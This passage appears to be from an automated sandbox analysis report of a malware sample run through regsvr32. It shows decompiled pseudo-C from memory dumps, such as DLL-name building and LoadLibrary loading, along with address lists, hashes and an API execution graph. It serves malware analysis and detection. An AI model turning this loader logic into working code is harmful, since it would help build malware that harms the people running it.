					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0xee85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x8508458b
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0x51ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E009A6020(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0x51ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x5d08408b
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0xee85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0xee85000
							E009A7180(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E009A5EE0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0xee85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































            0x009a4166
            0x009a416b
            0x009a416f
            0x009a4172
            0x009a4172
            0x009a4175
            0x009a417a
            0x009a417f
            0x009a4182
            0x009a4187
            0x009a418a
            0x009a4190
            0x009a4190
            0x009a419b
            0x009a419e
            0x009a41a5
            0x009a41aa
            0x00000000
            0x00000000
            0x009a41b0
            0x009a41b5
            0x009a41b5
            0x009a41ba
            0x009a41c0
            0x009a41ca
            0x009a41cf
            0x009a41d5
            0x009a41f4
            0x009a41f7
            0x009a4202
            0x009a4202
            0x009a4202
            0x009a41f9
            0x009a41f9
            0x009a41fb
            0x00000000
            0x009a41fd
            0x009a41fd
            0x009a41fd
            0x009a41fb
            0x009a420a
            0x009a420f
            0x009a4214
            0x009a421a
            0x009a421e
            0x009a4221
            0x009a4224
            0x009a422a
            0x009a422f
            0x009a4232
            0x009a4238
            0x009a423d
            0x009a4243
            0x009a4249
            0x009a424e
            0x009a4251
            0x009a4256
            0x009a425a
            0x009a425e
            0x009a4261
            0x009a4264
            0x009a426d
            0x009a4274
            0x009a4277
            0x009a427a
            0x009a427f
            0x009a4284
            0x009a4287
            0x009a428a
            0x009a428a
            0x009a428e
            0x009a4297
            0x009a429e
            0x009a42a1
            0x009a42a6
            0x009a42ab
            0x009a42ab
            0x009a42ae
            0x009a42b3
            0x00000000
            0x00000000
            0x009a41d7
            0x009a41d9
            0x009a41e6
            0x00000000
            0x00000000
            0x009a41e6
            0x009a41d9
            0x00000000
            0x009a41d5
            0x009a42b9
            0x009a42be
            0x009a42c1
            0x009a42c4
            0x009a436f
            0x009a436f
            0x009a42ca
            0x009a42ca
            0x009a42ca
            0x009a42cf
            0x009a42f9
            0x009a42fc
            0x009a42fc
            0x009a4301
            0x009a4303
            0x009a4305
            0x009a4308
            0x009a430b
            0x009a4313
            0x009a4318
            0x009a4318
            0x009a431e
            0x009a4321
            0x009a4324
            0x009a4327
            0x009a4329
            0x009a4329
            0x009a432a
            0x009a432a
            0x009a4327
            0x009a4338
            0x009a433b
            0x009a433f
            0x009a4344
            0x009a4347
            0x009a434a
            0x009a434a
            0x009a434a
            0x009a434d
            0x009a434d
            0x009a4350
            0x009a4350
            0x009a42d1
            0x009a42d1
            0x009a42e1
            0x009a42e4
            0x009a42e9
            0x009a42e9
            0x009a42ec
            0x009a42ef
            0x009a42f2
            0x009a42f4
            0x009a42f4
            0x009a4353
            0x009a4355
            0x009a4358
            0x009a4358
            0x009a435e
            0x009a4362
            0x009a4365
            0x009a4367
            0x009a4367
            0x009a4378
            0x009a437a
            0x009a437a
            0x009a4382
            0x009a4390
            0x009a4393
            0x009a4395
            0x009a43b5
            0x009a43b5
            0x009a43b8
            0x009a43be
            0x009a43bf
            0x009a43c2
            0x009a43c4
            0x009a43c7
            0x009a43ca
            0x009a43cd
            0x009a43d1
            0x009a43d4
            0x009a43d7
            0x009a43da
            0x009a43dc
            0x009a43dc
            0x009a43df
            0x009a43e1
            0x009a43e1
            0x009a43e4
            0x009a43e6
            0x009a43e9
            0x009a43f1
            0x009a43f4
            0x009a43f9
            0x009a43f9
            0x009a43ff
            0x009a4402
            0x009a4405
            0x009a4407
            0x009a4407
            0x009a4408
            0x009a4408
            0x009a4413
            0x009a4413
            0x009a4413
            0x009a4416
            0x009a4419
            0x009a4419
            0x009a441c
            0x009a441c
            0x009a43df
            0x009a441f
            0x009a4422
            0x009a4425
            0x009a4427
            0x009a442a
            0x009a442c
            0x009a442f
            0x009a4432
            0x009a4434
            0x009a4437
            0x009a443f
            0x009a4447
            0x009a444a
            0x009a444a
            0x009a444a
            0x009a444d
            0x009a444d
            0x009a444d
            0x009a4450
            0x009a4456
            0x009a4458
            0x009a4458
            0x009a445e
            0x009a4464
            0x009a446d
            0x009a4474
            0x009a4476
            0x009a4479
            0x009a4479
            0x009a447c
            0x009a447c
            0x009a447f
            0x009a4481
            0x009a4484
            0x009a4486
            0x009a44a1
            0x009a44a1
            0x009a44a5
            0x009a44a8
            0x009a44ab
            0x009a44ae
            0x009a44c4
            0x009a44c4
            0x009a44c4
            0x009a44b0
            0x009a44b0
            0x009a44b2
            0x009a44b6
            0x009a44b9
            0x00000000
            0x009a44bb
            0x009a44bb
            0x009a44bd
            0x00000000
            0x009a44bf
            0x009a44bf
            0x009a44bf
            0x009a44bd
            0x009a44b9
            0x009a44c8
            0x009a44cb
            0x009a44d0
            0x009a44da
            0x009a44da
            0x009a44da
            0x009a44dd
            0x009a4488
            0x009a4488
            0x009a448a
            0x009a4491
            0x009a4491
            0x009a4493
            0x009a4495
            0x009a4497
            0x009a449b
            0x009a449d
            0x009a449f
            0x00000000
            0x00000000
            0x009a449f
            0x009a449b
            0x009a448c
            0x009a448c
            0x009a448f
            0x00000000
            0x00000000
            0x009a448f
            0x009a448a
            0x009a44e7
            0x009a44e9
            0x009a44e9
            0x009a44f4
            0x009a4397
            0x009a4397
            0x009a439a
            0x00000000
            0x009a439c
            0x009a439c
            0x009a439e
            0x009a43a2
            0x00000000
            0x009a43a4
            0x009a43a4
            0x009a43a4
            0x009a43a7
            0x00000000
            0x009a43ab
            0x009a43b4
            0x009a43b4
            0x009a43a7
            0x009a43a2
            0x009a439a
            0x009a4386
            0x009a438f
            0x009a438f

            APIs
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: memcpy
            • String ID:
            • API String ID: 3510742995-0
            • Opcode ID: 03b0abeb86da1b833a58bdc3ae0fa7b72a6af37fe1020f7e2813aec2e01359af
            • Instruction ID: 7f209831dea3d48f1611e155d6d65b02c5f919c1b971d3356a80ced1d80759e8
            • Opcode Fuzzy Hash: 03b0abeb86da1b833a58bdc3ae0fa7b72a6af37fe1020f7e2813aec2e01359af
            • Instruction Fuzzy Hash: E6D12275A00B009FCB24CF6DC9C4A6AB7E5FF89304B24892DE89AC7711D771E945CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099D309 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 89%
            			E0099D309(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				intOrPtr _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x9af8d4; // 0x452fc00
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E00999F85(_t50, 0xb9d);
					_t66 =  *0x9af8d4; // 0x452fc00
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E00999FE4( &_v140, 0x40, L"%08x", E0099E34A(_t66 + 0xb0, E0099A5D0(_t66 + 0xb0), 0));
					_t20 =  *0x9af8d4; // 0x452fc00
					asm("sbb eax, eax");
					_t25 = E00999F85(_t67, ( ~( *(_t20 + 0xa8)) & 0xfffffeb6) + 0xded);
					_t26 =  *0x9af8d4; // 0x452fc00
					_t68 = E00999C50(_t26 + 0x1020);
					_v12 = _t68;
					E00998D9A( &_v8);
					_t32 =  *0x9af8d4; // 0x452fc00
					_t34 = E00999C50(_t32 + 0x122a);
					 *0x9af9d4 = _t34;
					_t35 =  *0x9af8d0; // 0x452f8c0
					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x9ac9d8,  &_v140, ".", L"dll", 0, 0x9ac9d8, _t25, 0x9ac9d8, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x9af9d4);
					 *0x9af9cc = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E0099F08E(0x9acbc4, _t60);
					}
					 *0x9af9d0 = _t38;
					E00998DDF( &_v12, 0xfffffffe);
					E00998F63( &_v140, 0, 0x80);
					if( *0x9af9d0 != 0) {
						goto L10;
					} else {
						E00998DDF(0x9af9d4, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x9af9d0 == 0) {
						_t46 =  *0x9af908; // 0x452fa00
						 *0x9af9d0 = _t46;
					}
					L10:
					return 1;
				}
			}

























            0x0099d309
            0x0099d309
            0x0099d309
            0x0099d30c
            0x0099d318
            0x0099d323
            0x0099d33f
            0x0099d344
            0x0099d34d
            0x0099d34f
            0x0099d357
            0x0099d378
            0x0099d37d
            0x0099d38a
            0x0099d397
            0x0099d3a5
            0x0099d3b6
            0x0099d3bc
            0x0099d3bf
            0x0099d3d6
            0x0099d3e2
            0x0099d3ea
            0x0099d3f1
            0x0099d3f7
            0x0099d403
            0x0099d409
            0x0099d410
            0x0099d423
            0x0099d412
            0x0099d412
            0x0099d415
            0x0099d41b
            0x0099d420
            0x0099d425
            0x0099d430
            0x0099d442
            0x0099d454
            0x00000000
            0x0099d456
            0x0099d45d
            0x00000000
            0x0099d463
            0x0099d464
            0x0099d464
            0x0099d46b
            0x0099d46d
            0x0099d472
            0x0099d472
            0x0099d477
            0x0099d47b
            0x0099d47b

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID: %08x$dll
            • API String ID: 1029625771-2963171978
            • Opcode ID: f50a60e3f6a2d1633b9c3efbcf939d226613035a25ce0f5bd789f2aea3753152
            • Instruction ID: 76b57a9348df54fb75bfd6d2cd82f155a7d852adc29e8a56a29b2db07052e409
            • Opcode Fuzzy Hash: f50a60e3f6a2d1633b9c3efbcf939d226613035a25ce0f5bd789f2aea3753152
            • Instruction Fuzzy Hash: 9E3170B2615204ABDB10EBACDC56FAB33ECEF86714F14417AB109D75A1DE389D4087A1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009A36D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55stringCOMMON
            Download Yara Rule
            C-Code - Quality: 47%
            			E009A36D5(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				char _v5;
				long long _v12;
				short _v20;
				signed int _t15;
				void* _t16;
				signed int _t22;
				char _t25;
				void* _t26;
				signed int _t28;
				intOrPtr _t29;
				void* _t31;
				char** _t32;
				long long _t40;
				long long _t41;

				_t40 = __fp0;
				_t15 = E009A35EE(_a4);
				 *_t32 = "msxml32.dll";
				_t28 = _t15 & 0x0fffffff;
				_t16 = E0099A5D0();
				_t26 = 0xf;
				_t25 = 0;
				_v5 = 0;
				if(_t16 > _t26) {
					L2:
					_t3 = _t25 + 0x41; // 0x41
					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
					_t25 = _t25 + 1;
				} else {
					_t26 = _t16;
					if(_t26 != 0) {
						do {
							goto L2;
						} while (_t25 < _t26);
					}
				}
				lstrlenW( &_v20);
				_t29 = _a8;
				_t22 = _a12 - _t29 + 1;
				_a12 = _t22;
				asm("fild dword [ebp+0x10]");
				if(_t22 < 0) {
					_t40 = _t40 +  *0x9acf90;
				}
				_a12 = _t28;
				_v12 = _t40;
				_t41 = _v12;
				asm("fild dword [ebp+0x10]");
				if(_t28 < 0) {
					_t41 = _t41 +  *0x9acf90;
				}
				_v12 = _t41;
				asm("fmulp st1, st0");
				L009A8995();
				return _t29 - _t22;
			}

















            0x009a36d5
            0x009a36e0
            0x009a36e7
            0x009a36ee
            0x009a36f4
            0x009a36fc
            0x009a36fd
            0x009a36ff
            0x009a3704
            0x009a370c
            0x009a370c
            0x009a370f
            0x009a3713
            0x009a3706
            0x009a3706
            0x009a370a
            0x009a370c
            0x00000000
            0x00000000
            0x009a370c
            0x009a370a
            0x009a371c
            0x009a3725
            0x009a372a
            0x009a372d
            0x009a3730
            0x009a3733
            0x009a3735
            0x009a3735
            0x009a373b
            0x009a373e
            0x009a3741
            0x009a3744
            0x009a3749
            0x009a374b
            0x009a374b
            0x009a3751
            0x009a375d
            0x009a375f
            0x009a376b

            APIs
            • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 009A371C
            • _ftol2_sse.MSVCRT ref: 009A375F
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: _ftol2_sselstrlen
            • String ID: msxml32.dll
            • API String ID: 1292649733-2051705522
            • Opcode ID: 066130ded4274e14e535777ca92309a176b32fe7e0c75d36529bbb2ffeb3d8f3
            • Instruction ID: 80eeedb99f360794c0bff557ef15581be560cec0bf4a769c5edfa8869e293f70
            • Opcode Fuzzy Hash: 066130ded4274e14e535777ca92309a176b32fe7e0c75d36529bbb2ffeb3d8f3
            • Instruction Fuzzy Hash: 9A1108B2A04259ABCF009F69E8051DE7FB5FF96310F268559F855C6255EB30C660C7C1
            Uniqueness

            Uniqueness Score: -1.00%

            Execution Graph

            Execution Coverage:6.1%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:0%
            Total number of Nodes:2000
            Total number of Limit Nodes:52
            execution_graph 13955 44557c3 13974 4459eab 13955->13974 13958 44558c4 13960 44557f2 13960->13958 13961 4459f6b 2 API calls 13960->13961 13962 445580a 13961->13962 13963 4459fa5 2 API calls 13962->13963 13964 445581f 13963->13964 13965 4458d87 2 API calls 13964->13965 13966 4455827 13965->13966 13967 4458ddf 2 API calls 13966->13967 13968 4455842 13967->13968 13969 445b787 2 API calls 13968->13969 13971 4455850 13969->13971 13970 445c402 11 API calls 13970->13971 13971->13970 13972 44558b9 13971->13972 13973 4458ddf 2 API calls 13972->13973 13973->13958 13975 44598e9 2 API calls 13974->13975 13976 4459ecc 13975->13976 13977 4459c50 2 API calls 13976->13977 13978 44557db 13977->13978 13978->13958 13979 4458dc9 RtlAllocateHeap 13978->13979 13979->13960 13999 445fbd6 14002 4458dc9 RtlAllocateHeap 13999->14002 14001 445fbe6 14002->14001 13143 445225e 13144 44598e9 2 API calls 13143->13144 13145 4452295 13144->13145 13146 445bfc8 2 API calls 13145->13146 13147 44522ad 13146->13147 13148 44522b4 13147->13148 13165 445c4d1 memset 13147->13165 13151 4458ddf 2 API calls 13148->13151 13150 44522c4 13150->13148 13156 4459f85 2 API calls 13150->13156 13160 4459c50 RtlAllocateHeap lstrcatW 13150->13160 13161 4458d9a HeapFree memset 13150->13161 13162 445109a 2 API calls 13150->13162 13163 4458ddf HeapFree memset 13150->13163 13164 445b787 memset GetExitCodeProcess 13150->13164 13152 44523fe 13151->13152 13154 445241a 13152->13154 13158 4458ddf 2 API calls 13152->13158 13159 4452425 13152->13159 13153 4459e22 2 API calls 13157 4452432 13153->13157 13155 4458ddf 2 API calls 13154->13155 13155->13159 13156->13150 13158->13152 13159->13153 13160->13150 13161->13150 13162->13150 13163->13150 13164->13150 13180 4458dc9 RtlAllocateHeap 13165->13180 13167 445c4f8 13168 4459ab3 RtlAllocateHeap 13167->13168 13179 445c57c 13167->13179 13169 445c516 13168->13169 13170 4459ab3 RtlAllocateHeap 13169->13170 13171 445c529 13170->13171 13172 4459ab3 RtlAllocateHeap 13171->13172 13173 445c53d 13172->13173 13174 4459f85 2 API calls 13173->13174 13175 445c54a 13174->13175 13176 4458d9a 2 API calls 13175->13176 13177 445c570 13176->13177 13178 4459ab3 RtlAllocateHeap 13177->13178 13178->13179 13179->13150 13180->13167 13261 445286e 13262 4452885 13261->13262 13263 4452964 13261->13263 13264 445bfc8 2 API calls 13262->13264 13265 4459e22 2 API calls 13263->13265 13266 4452891 13264->13266 13267 4452970 13265->13267 13266->13263 13291 4459f14 13266->13291 13270 4452956 13271 4458ddf 2 API calls 13270->13271 13271->13263 13272 4459b26 2 API calls 13273 44528b5 13272->13273 13295 445bf56 13273->13295 13275 44528c8 13276 445293d 13275->13276 13277 4459b26 2 API calls 13275->13277 13278 4458ddf 2 API calls 13276->13278 13280 44528d4 13277->13280 13279 445294b 13278->13279 13282 4458ddf 2 API calls 13279->13282 13281 445109a 2 API calls 13280->13281 13283 44528e0 13281->13283 13282->13270 13284 4459c50 2 API calls 13283->13284 13285 44528f1 13284->13285 13286 4458d9a 2 API calls 13285->13286 13287 44528ff 13286->13287 13287->13276 13288 445b787 2 API calls 13287->13288 13289 445291d 13288->13289 13290 4458ddf 2 API calls 13289->13290 13290->13276 13292 4459f1d 13291->13292 13294 44528a3 13291->13294 13298 4458dc9 RtlAllocateHeap 13292->13298 13294->13270 13294->13272 13299 4458dc9 RtlAllocateHeap 13295->13299 13297 445bf7b 13297->13275 13298->13294 13299->13297 13349 4452701 13350 4452712 13349->13350 13351 445272a 13349->13351 13357 44570a0 13350->13357 13380 445267d 13351->13380 13355 4459e22 2 API calls 13356 4452743 13355->13356 13358 44570c2 13357->13358 13371 44570ba 13357->13371 13359 445bfc8 2 API calls 13358->13359 13360 44570cb 13359->13360 13360->13371 13387 4460e8e 13360->13387 13363 44570e5 13365 4458ddf 2 API calls 13363->13365 13364 4459993 7 API calls 13366 445711b 13364->13366 13365->13371 13367 445670a 5 API calls 13366->13367 13366->13371 13368 445712d 13367->13368 13369 445713a 13368->13369 13372 4457152 13368->13372 13370 4458ddf 2 API calls 13369->13370 13370->13371 13371->13351 13373 4455c05 8 API calls 13372->13373 13379 4457172 13372->13379 13376 445716e 13373->13376 13374 4458ddf 2 API calls 13375 44571a4 13374->13375 13377 4458ddf 2 API calls 13375->13377 13378 445abf8 6 API calls 13376->13378 13376->13379 13377->13363 13378->13379 13379->13374 13381 445bfc8 2 API calls 13380->13381 13382 445268e 13381->13382 13383 44526b2 13382->13383 13384 44526a5 13382->13384 13398 445adc2 13382->13398 13383->13355 13386 4458ddf 2 API calls 13384->13386 13386->13383 13388 4460e9d 13387->13388 13389 4460ed9 13387->13389 13391 4458ddf 2 API calls 13388->13391 13397 4458dc9 RtlAllocateHeap 13389->13397 13392 4460ea6 13391->13392 13393 44570df 13392->13393 13394 4458e2e RtlAllocateHeap 13392->13394 13393->13363 13393->13364 13395 4460ebd 13394->13395 13395->13393 13396 445fb9c lstrlenW 13395->13396 13396->13393 13397->13392 13399 445adde 6 API calls 13398->13399 13400 445add9 13399->13400 13400->13384 11206 4456603 11207 4456611 11206->11207 11209 4456669 11206->11209 11235 4458db4 HeapCreate 11207->11235 11210 4456616 11236 4459787 11210->11236 11219 4456664 11222 4458d9a 2 API calls 11219->11222 11220 445666e 11256 4458d9a 11220->11256 11222->11209 11228 44566c5 CreateThread 11228->11209 11336 44563a2 11228->11336 11229 445f0d9 8 API calls 11230 44566a0 11229->11230 11269 445647a memset 11230->11269 11235->11210 11288 4458dc9 RtlAllocateHeap 11236->11288 11238 445661b 11239 4463d36 11238->11239 11240 4463d6b 11239->11240 11289 4458e2e 11240->11289 11242 4456629 11243 445f0d9 11242->11243 11293 4459f6b 11243->11293 11246 445f103 LoadLibraryA 11248 445f10a 11246->11248 11247 445f0fb GetModuleHandleA 11247->11248 11249 445f118 11248->11249 11296 445f08e 11248->11296 11301 4458d87 11249->11301 11253 4459f85 11319 4458ca3 11253->11319 11255 4456650 GetFileAttributesW 11255->11219 11255->11220 11257 4456673 11256->11257 11258 4458da8 11256->11258 11260 445109a 11257->11260 11259 4458ddf 2 API calls 11258->11259 11259->11257 11261 4458ca3 2 API calls 11260->11261 11262 44510b5 11261->11262 11263 445fcda 11262->11263 11264 445fcf6 11263->11264 11267 4456687 11264->11267 11325 4458dc9 RtlAllocateHeap 11264->11325 11266 445fd09 11266->11267 11268 4458ddf 2 API calls 11266->11268 11267->11228 11267->11229 11268->11267 11326 4451080 11269->11326 11271 44564a6 11272 44564b7 11271->11272 11273 44564f8 11271->11273 11275 4451080 2 API calls 11272->11275 11274 4451080 2 API calls 11273->11274 11276 4456502 11274->11276 11277 44564c1 11275->11277 11280 4458d87 2 API calls 11276->11280 11329 4459fa5 11277->11329 11279 44564d7 11281 4458d87 2 API calls 11279->11281 11282 44564e2 11280->11282 11281->11282 11283 4458ddf 11282->11283 11284 44566b5 11283->11284 11285 4458de9 11283->11285 11284->11228 11285->11284 11286 4458f63 memset 11285->11286 11287 4458e19 HeapFree 11286->11287 11287->11284 11288->11238 11292 4458dc9 RtlAllocateHeap 11289->11292 11291 4458e3f 11291->11242 11292->11291 11305 4458bcd 11293->11305 11312 4458dc9 RtlAllocateHeap 11296->11312 11298 445f0cf 11298->11249 11299 445f0a0 11299->11298 11313 445ef38 11299->11313 11302 4458d8f 11301->11302 11303 445663f 11301->11303 11304 4458ddf 2 API calls 11302->11304 11303->11253 11304->11303 11306 4458c05 11305->11306 11308 4458be4 11305->11308 11307 4458c4c lstrlenW 11306->11307 11310 4458c58 11306->11310 11307->11310 11308->11306 11311 4458dc9 RtlAllocateHeap 11308->11311 11310->11246 11310->11247 11311->11306 11312->11299 11314 445efac 11313->11314 11315 445ef51 11313->11315 11314->11299 11315->11314 11316 445f004 LoadLibraryA 11315->11316 11316->11314 11317 445f012 GetProcAddress 11316->11317 11317->11314 11318 445f01e 11317->11318 11318->11314 11321 4458cc4 lstrlenW 11319->11321 11324 4458dc9 RtlAllocateHeap 11321->11324 11323 4458d4b 11323->11255 11323->11323 11324->11323 11325->11266 11327 4458bcd 2 API calls 11326->11327 11328 4451096 11327->11328 11328->11271 11333 4458f63 11329->11333 11332 4459fd3 11332->11279 11334 4458f7d _vsnprintf 11333->11334 11335 4458f6c memset 11333->11335 11334->11332 11335->11334 11348 445651e 11336->11348 11340 44563b3 11344 44563ed 11340->11344 11347 44563bd 11340->11347 11411 445d889 11340->11411 11342 4456424 11342->11347 11451 4453597 11342->11451 11343 445641d 11427 44561e8 11343->11427 11344->11342 11344->11343 11349 445f0d9 8 API calls 11348->11349 11350 4456532 11349->11350 11351 445f0d9 8 API calls 11350->11351 11352 445654b 11351->11352 11353 445f0d9 8 API calls 11352->11353 11354 4456564 11353->11354 11355 445f0d9 8 API calls 11354->11355 11356 445657d 11355->11356 11357 445f0d9 8 API calls 11356->11357 11358 4456598 11357->11358 11359 445f0d9 8 API calls 11358->11359 11360 44565b1 11359->11360 11361 445f0d9 8 API calls 11360->11361 11362 44565ca 11361->11362 11363 445f0d9 8 API calls 11362->11363 11364 44565e3 11363->11364 11365 445f0d9 8 API calls 11364->11365 11366 44563a7 GetOEMCP 11365->11366 11367 445dfc2 11366->11367 11458 4458dc9 RtlAllocateHeap 11367->11458 11369 445dfdd 11370 445dfe8 GetCurrentProcessId 11369->11370 11410 445e33d 11369->11410 11371 445e000 11370->11371 11459 445ca0a 11371->11459 11373 445e053 11374 445e064 11373->11374 11466 445ca5a 11373->11466 11475 445f3a0 11374->11475 11379 445e099 11380 445e0e3 GetLastError 11379->11380 11381 445e0e9 GetSystemMetrics 11379->11381 11380->11381 11382 445e110 11381->11382 11484 445c85a 11382->11484 11388 445e14b 11501 445c870 11388->11501 11393 4458f63 memset 11394 445e1a2 GetVersionExA 11393->11394 11520 445ddbe 11394->11520 11398 445e1c0 GetWindowsDirectoryW 11399 4459f85 2 API calls 11398->11399 11400 445e1e3 11399->11400 11401 4458d9a 2 API calls 11400->11401 11402 445e21d 11401->11402 11404 445e255 11402->11404 11543 4459fe4 11402->11543 11526 446357b 11404->11526 11410->11340 11621 445d7cd 11411->11621 11414 445d9d5 11414->11344 11416 445d9ca 11417 4458ddf 2 API calls 11416->11417 11417->11414 11418 4458ddf 2 API calls 11419 445d9b8 11418->11419 11419->11416 11419->11418 11420 4458f63 memset 11426 445d8c6 11420->11426 11423 445d939 GetLastError 11651 445dadc ResumeThread 11423->11651 11425 445d963 FindCloseChangeNotification 11425->11426 11426->11416 11426->11419 11426->11420 11426->11423 11426->11425 11633 445be10 11426->11633 11638 445d9de 11426->11638 11721 445a79b 11427->11721 11430 44561f7 11430->11347 11431 445620f 11737 445601d 11431->11737 11437 4456223 11440 4456228 11437->11440 11441 4456277 11437->11441 11438 4456272 11772 44560d9 11438->11772 11442 4456293 11440->11442 11445 445b6e3 7 API calls 11440->11445 11441->11442 11450 4456270 11441->11450 11785 4460ac8 11441->11785 11442->11347 11446 4456248 11445->11446 11749 4455c8c 11446->11749 11806 44560bf 11450->11806 12969 4458dc9 RtlAllocateHeap 11451->12969 11453 445359e 11457 44535d5 11453->11457 12970 4458dc9 RtlAllocateHeap 11453->12970 11455 44535af 